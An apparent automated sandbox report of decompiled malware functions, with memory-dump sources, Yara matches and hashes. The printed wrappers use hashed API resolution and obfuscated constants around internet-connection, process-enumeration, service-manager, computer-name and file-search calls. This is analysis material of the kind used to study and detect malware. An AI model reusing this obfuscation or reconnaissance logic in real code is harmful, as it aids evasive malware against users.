                                              				signed int _t55;
                                              				void* _t63;
                                              				void* _t64;
                                              
                                              				_t64 = __edx;
                                              				E0021602B(_t43);
                                              				_v8 = 0x98b5;
                                              				_v8 = _v8 >> 9;
                                              				_t54 = 0x5f;
                                              				_v8 = _v8 / _t54;
                                              				_v8 = _v8 + 0xffff1c63;
                                              				_v8 = _v8 ^ 0xffff635b;
                                              				_v12 = 0x5016;
                                              				_v12 = _v12 + 0xffff6b9b;
                                              				_t55 = 0x41;
                                              				_v12 = _v12 / _t55;
                                              				_v12 = _v12 ^ 0x03f03403;
                                              				_t51 = E002207A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
                                              				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
                                              				return _t52;
                                              			}













                                              APIs
                                              • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 0021765C
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject
                                              • String ID:
                                              • API String ID: 1207547050-0
                                              • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                              • Instruction ID: 466b87d670fa514f9ef40b1a7dd8c577b7083670feaf8a944ad7cc4bf7ef93ab
                                              • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                              • Instruction Fuzzy Hash: 6421087290060CFFDF05CF94DC46DDE7F76EB08314F148148FA1866160D7B29A61AB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 71%
                                              			E0021109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t30;
                                              				void* _t38;
                                              				signed int _t40;
                                              				WCHAR* _t46;
                                              
                                              				_push(_a16);
                                              				_t46 = __edx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0021602B(_t30);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0xf19a8;
                                              				_v20 = 0x58c643;
                                              				_v12 = 0xbcc6;
                                              				_v12 = _v12 | 0xbb59ffff;
                                              				_v12 = _v12 ^ 0xbb59839d;
                                              				_v8 = 0x5dbd;
                                              				_v8 = _v8 << 0xd;
                                              				_t40 = 0x3f;
                                              				_v8 = _v8 / _t40;
                                              				_v8 = _v8 * 0x1f;
                                              				_v8 = _v8 ^ 0x05c44d1b;
                                              				E002207A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
                                              				_t38 = FindFirstFileW(_t46, _a4); // executed
                                              				return _t38;
                                              			}













                                              APIs
                                              • FindFirstFileW.KERNEL32(?,BB59839D), ref: 0021112B
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                              • Instruction ID: 95e830f69cddbbf310b5d25a68cd91da25bba245e04752321fa086ce7e66e58a
                                              • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                              • Instruction Fuzzy Hash: DE1157B5D01218FBDF04EFA8D94A9DEBFB5EF44314F208098E9086B251D7B54B249F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E0022023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t25;
                                              				int _t31;
                                              				void* _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t37 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0021602B(_t25);
                                              				_v12 = 0x4c1d;
                                              				_v12 = _v12 ^ 0x5ad90362;
                                              				_v12 = _v12 ^ 0x5ad955af;
                                              				_v8 = 0xc5f7;
                                              				_v8 = _v8 * 0x75;
                                              				_v8 = _v8 ^ 0x98520be0;
                                              				_v8 = _v8 + 0xd998;
                                              				_v8 = _v8 ^ 0x98094817;
                                              				E002207A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
                                              				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
                                              				return _t31;
                                              			}









                                              APIs
                                              • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002202BC
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileInternetRead
                                              • String ID:
                                              • API String ID: 778332206-0
                                              • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                              • Instruction ID: a28a69fdc8fe5534aed365bbdc5b289619f6e123eff04be3156aff59b3b79206
                                              • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                              • Instruction Fuzzy Hash: 18012576912208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D372AF61AB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E00211C88(int _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _v24;
                                              				intOrPtr _v28;
                                              				void* _t28;
                                              				signed int _t29;
                                              
                                              				_v28 = 0x4309a9;
                                              				asm("stosd");
                                              				_t29 = 0x31;
                                              				asm("stosd");
                                              				asm("stosd");
                                              				_v12 = 0x7af7;
                                              				_v12 = _v12 + 0x2003;
                                              				_v12 = _v12 ^ 0x000083a5;
                                              				_v8 = 0xa138;
                                              				_v8 = _v8 << 8;
                                              				_v8 = _v8 / _t29;
                                              				_v8 = _v8 ^ 0x00030e85;
                                              				E002207A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
                                              				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 00211CF3
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3332741929-0
                                              • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                              • Instruction ID: db72b8ba53f870f5452a777bf1ab8c3a8d9102bfa74b6068e551b0070268bec7
                                              • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                              • Instruction Fuzzy Hash: 37F08C71E00208BBFB04DFA8CD4A68EFBB6EF84704F208099E5006B291DBF55F148B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 42%
                                              			E00215A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _v24;
                                              				intOrPtr _v28;
                                              				void* _t25;
                                              				void* _t31;
                                              				WCHAR* _t37;
                                              
                                              				_t37 = __ecx;
                                              				_push(0);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(0);
                                              				_push(0);
                                              				_push(__ecx);
                                              				E0021602B(_t25);
                                              				_v28 = 0x354aea;
                                              				asm("stosd");
                                              				asm("stosd");
                                              				asm("stosd");
                                              				_v8 = 0x4733;
                                              				_v8 = _v8 << 0xb;
                                              				_v8 = _v8 + 0xffffa4b2;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x00006f5b;
                                              				_v12 = 0x6e5;
                                              				_v12 = _v12 ^ 0x21b9cf62;
                                              				_v12 = _v12 ^ 0x21b9d5f6;
                                              				E002207A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
                                              				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
                                              				return _t31;
                                              			}











                                              APIs
                                              • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 00215AE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: J5
                                              • API String ID: 2038078732-3088381744
                                              • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                              • Instruction ID: 517d5946bd8d9e93b317ac873baac85b92294941a942e2a11d894bf2482ec1fa
                                              • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                              • Instruction Fuzzy Hash: 95113C7290060CBFEB05DF98DD859DFBB79EF14358F104098FA0562120D3B64E659BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E0021602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                              • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                              • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                              • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E0021602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                              • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                              • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                              • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0021F74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t28;
                                              				intOrPtr* _t35;
                                              				void* _t36;
                                              				signed int _t38;
                                              				void* _t44;
                                              				void* _t45;
                                              
                                              				_t45 = __edx;
                                              				E0021602B(_t28);
                                              				_v8 = 0x515c;
                                              				_v8 = _v8 + 0xc7b4;
                                              				_t38 = 0xc;
                                              				_v8 = _v8 / _t38;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x000000a5;
                                              				_v12 = 0xe7ac;
                                              				_v12 = _v12 * 3;
                                              				_v12 = _v12 ^ 0xe245e609;
                                              				_v12 = _v12 ^ 0xe24720e8;
                                              				_t35 = E002207A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
                                              				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
                                              				return _t36;
                                              			}












                                              APIs
                                              • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 0021F7D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AgentObtainStringUser
                                              • String ID: G
                                              • API String ID: 2681117516-4236931613
                                              • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                              • Instruction ID: 0f786674abe8b1987a1530dc362158abe5063ad0ab3caa6281f6353e3803f3d3
                                              • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                              • Instruction Fuzzy Hash: DB015771900208FBEB04DF94DD4AADEBFB5EF84310F208088F50866290E7B55B60DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 76%
                                              			E002176F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t28;
                                              				void* _t35;
                                              				signed int _t37;
                                              				struct tagPROCESSENTRY32W* _t43;
                                              
                                              				_push(_a8);
                                              				_t43 = __ecx;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0021602B(_t28);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x5756b4;
                                              				_v20 = 0x17430f;
                                              				_v12 = 0x6271;
                                              				_t37 = 0x43;
                                              				_v12 = _v12 / _t37;
                                              				_v12 = _v12 ^ 0x00004051;
                                              				_v8 = 0x9292;
                                              				_v8 = _v8 + 0x9a70;
                                              				_v8 = _v8 << 0xb;
                                              				_v8 = _v8 * 0x3d;
                                              				_v8 = _v8 ^ 0x3dcb9719;
                                              				_t35 = E002207A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
                                              				Process32FirstW(_a8, _t43); // executed
                                              				return _t35;
                                              			}













                                              APIs
                                              • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 00217780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FirstProcess32
                                              • String ID: nS8U
                                              • API String ID: 2623510744-2564412997
                                              • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                              • Instruction ID: ba5dfddb9bd464ab807dd692bf2e988a718ef520c1c1f4cbeae11df6f9bba76e
                                              • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                              • Instruction Fuzzy Hash: 980165B5D01218FBEB04DFA4D90A9EEBFB5EF40314F208089E8186B251E7B55B249B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E0021602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                              • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                              • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                              • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E0021602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t23;
                                              				int _t29;
                                              				CHAR* _t34;
                                              
                                              				_push(_a8);
                                              				_t34 = __edx;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0021602B(_t23);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v28 = 0x56a9ae;
                                              				_v24 = 0x46a5f8;
                                              				_v20 = 0x71462f;
                                              				_v8 = 0x2cb4;
                                              				_v8 = _v8 + 0xdc6b;
                                              				_v8 = _v8 * 0x25;
                                              				_v8 = _v8 ^ 0x0026370c;
                                              				_v12 = 0x2021;
                                              				_v12 = _v12 ^ 0x8c534c3d;
                                              				_v12 = _v12 ^ 0x8c530eb3;
                                              				E002207A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
                                              				_t29 = GetComputerNameA(_t34, _a4); // executed
                                              				return _t29;
                                              			}













                                              APIs
                                              • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002160B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: /Fq
                                              • API String ID: 3545744682-1299280358
                                              • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                              • Instruction ID: bd2c748020dbff8ba792457bc4c28fe06cf9d4bc51cfb3b10f5b7437f6f5bcea
                                              • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                              • Instruction Fuzzy Hash: 990116B5C1121CBBDB04EFE4D94A9EEBFB4EF45314F108189E8086B252D3B54B649F92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E0021595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				int _t27;
                                              				void* _t33;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a8);
                                              				_t33 = __edx;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0021602B(_t22);
                                              				_v8 = 0xecfb;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 + 0x8346;
                                              				_v8 = _v8 + 0xffffe2f9;
                                              				_v8 = _v8 ^ 0x000008ac;
                                              				_v12 = 0x34e0;
                                              				_v12 = _v12 >> 0xf;
                                              				_v12 = _v12 ^ 0x1d0c124c;
                                              				_v12 = _v12 ^ 0x1d0c2b7f;
                                              				E002207A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
                                              				_t27 = FindNextFileW(_t33, _a4); // executed
                                              				return _t27;
                                              			}









                                              APIs
                                              • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002159CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileFindNext
                                              • String ID: 4
                                              • API String ID: 2029273394-293933855
                                              • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                              • Instruction ID: 2c8ce4754a0ffbe7908c498d895a762f3800d8526d013eab3729bfcb85719b25
                                              • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                              • Instruction Fuzzy Hash: 8A014676D11218BBEB14DFA4D84A8DEBE78EF50354F108188E80867251E7B25F649BA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E00224F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0021602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNEL32(003E66D8), ref: 00224FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                              • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                              • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                              • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 43%
                                              			E00227955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				WCHAR* _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t41;
                                              				short _t47;
                                              
                                              				_push(_a52);
                                              				_t47 = __ecx;
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(0);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(0);
                                              				_push(_a4);
                                              				_push(__ecx & 0x0000ffff);
                                              				E0021602B(__ecx & 0x0000ffff);
                                              				_v24 = 0x1f9770;
                                              				_v20 = 0x380697;
                                              				_v16 = 0;
                                              				_v12 = 0x6440;
                                              				_v12 = _v12 * 0xf;
                                              				_v12 = _v12 * 0x65;
                                              				_v12 = _v12 ^ 0x02513e1b;
                                              				_v8 = 0x9d26;
                                              				_v8 = _v8 << 0xa;
                                              				_v8 = _v8 ^ 0x42bae3e2;
                                              				_v8 = _v8 + 0x19dc;
                                              				_v8 = _v8 ^ 0x40ce99cc;
                                              				E002207A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
                                              				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
                                              				return _t41;
                                              			}











                                              APIs
